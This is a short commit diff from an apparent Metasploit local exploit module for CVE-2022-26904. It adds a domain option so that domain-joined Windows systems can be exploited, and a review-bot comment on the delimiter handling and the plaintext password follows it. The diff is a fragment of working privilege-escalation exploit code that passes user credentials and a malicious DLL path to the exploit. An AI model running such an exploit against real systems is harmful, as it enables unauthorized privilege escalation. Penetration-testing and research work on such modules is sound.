Add in support for exploiting domain joined systems

Grant Willcox 2022-03-28 16:14:19 -05:00
parent b408197cb7
commit bd3e0c1b53
No known key found for this signature in database
GPG Key ID: D35E05C0F2B81E83
2 changed files with 2 additions and 1 deletions


@ -75,6 +75,7 @@ class MetasploitModule < Msf::Exploit::Local
register_options([
OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),
OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. Ensures we log into the right domain.', '.']),
OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])
])
end
@ -227,7 +228,7 @@ class MetasploitModule < Msf::Exploit::Local
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')
library_path = ::File.expand_path(library_path)
dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s
dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation, and the credentials for the second user.
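Review bot: The new `dll_info_parameter` line joins four option values with `'||'` but nothing checks that a value does not itself contain `||`, so a password or domain holding that sequence would shift every later field when the receiver splits the string. Going from three fields to four also means the DLL-side parser has to change in step; that code is not visible here and is presumably the second changed file. I would reject such values before building the string, e.g. `fail_with(Failure::BadConfig, 'LOGINUSER, LOGINDOMAIN and LOGINPASSWORD must not contain "||"') if %w[LOGINUSER LOGINDOMAIN LOGINPASSWORD].any? { |o| datastore[o].to_s.include?('||') }`, and build the value with `[...].join('||')` instead of chained `+`. The string carries the plaintext password, so keep it out of any `print_status`/`vprint_status` output. The enclosing method starts and ends outside the hunk.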